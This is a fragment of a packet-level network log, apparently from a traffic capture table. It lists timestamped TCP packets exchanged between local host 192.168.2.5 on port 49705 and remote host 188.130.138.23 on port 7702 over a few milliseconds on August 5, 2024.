                        Aug 5, 2024 05:54:24.519660950 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519660950 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519670010 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519676924 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519690037 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519691944 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519702911 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519716024 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519716024 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519728899 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519741058 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519742012 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519754887 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519762039 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519769907 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519783974 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519785881 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519797087 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519802094 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519812107 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519823074 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519826889 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519840002 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519845963 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519855022 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519855022 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519869089 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.519882917 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519898891 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.519922018 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522577047 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522593021 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522605896 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522618055 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522628069 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522629976 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522644043 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522656918 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522669077 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522680998 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522692919 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522694111 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522694111 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522713900 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522722006 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522727013 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522741079 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522743940 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522753000 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522762060 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522767067 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522780895 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522782087 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522794962 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522794962 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522808075 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522809029 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522820950 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522825003 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522835016 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522849083 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522849083 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522861958 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522875071 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522881031 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522886992 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522901058 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522902012 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522902012 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522916079 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522922993 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522932053 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522944927 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522952080 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522958040 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522967100 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522973061 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.522975922 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.522988081 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523000002 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523001909 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523015976 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523016930 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523029089 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523035049 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523044109 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523051023 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523058891 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523061037 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523072958 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523072958 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523087025 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523093939 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523099899 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523103952 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523113012 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523116112 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523127079 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523137093 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523142099 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523149014 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523155928 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.523166895 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523180962 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523204088 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.523994923 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524010897 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524024010 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524036884 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524046898 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524050951 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524063110 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524075985 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524090052 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524101973 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524113894 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524126053 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524137974 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524151087 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524163008 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524177074 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524189949 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524202108 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524214983 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524225950 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524238110 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524250031 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524265051 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524264097 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524277925 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524291039 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524302959 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524317980 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524322987 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524322987 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524322987 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524333000 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524347067 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524353981 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524353981 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524359941 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524373055 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524384022 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524384022 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524384975 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524384022 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524404049 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524415970 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524416924 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524415970 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524415970 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524431944 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524439096 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524445057 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524446964 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524458885 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524471998 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524471998 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524491072 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524494886 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524502993 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524508953 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524518967 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524523020 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524535894 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524540901 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524549961 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524563074 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.524574041 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524597883 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.524612904 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527278900 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527293921 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527307034 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527321100 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527333975 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527347088 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527350903 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527359962 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527374983 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527375937 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527389050 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527389050 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527403116 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527411938 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527415991 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527430058 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527434111 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527442932 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527456999 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527460098 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527471066 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527473927 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527483940 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527493954 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527498007 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527512074 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527517080 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527523994 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527530909 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527538061 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527544975 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527553082 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527563095 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527566910 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527580976 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527585030 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527595043 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527601004 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527615070 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527616024 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527626038 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527627945 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527645111 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527646065 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527658939 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527663946 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527673006 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527674913 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527687073 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527698040 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527698994 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527713060 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527719021 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527725935 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527736902 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527740955 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527754068 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527760029 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527767897 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527776003 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527782917 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527796030 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527800083 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527808905 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527812958 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527822971 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527834892 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527838945 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527847052 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527861118 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.527867079 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527868032 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527882099 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.527905941 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528687954 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528704882 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528717041 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528728962 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528743982 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528758049 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528770924 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528784037 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528795958 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528800964 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528809071 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528821945 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528826952 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528834105 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528850079 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528851032 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528863907 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528863907 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528877974 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528882027 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528891087 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528903961 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528906107 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528913975 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528920889 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528932095 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528934956 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528949022 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528951883 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528963089 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.528963089 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528976917 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528990030 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.528990030 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529005051 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529011965 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529019117 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529028893 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529033899 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529045105 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529047012 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529058933 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529063940 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529079914 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529086113 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529094934 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529099941 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529109001 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529113054 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529122114 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529134989 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529136896 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529146910 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529150963 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529160976 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529172897 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529186010 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529186964 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529200077 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529200077 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529213905 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529220104 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529228926 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529236078 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529242039 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529252052 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529256105 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529268980 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529272079 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529289961 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529294014 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529304028 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529306889 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529318094 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529320002 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.529335022 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529350996 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.529370070 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532004118 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532020092 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532032013 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532044888 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532049894 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532058001 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532068014 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532071114 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532084942 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532089949 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532098055 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532110929 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532119989 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532124996 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532135010 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532138109 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532150984 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532155037 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532164097 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532176971 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532181978 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532190084 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532196999 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.532205105 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.532213926 CEST497057702192.168.2.5188.130.138.23
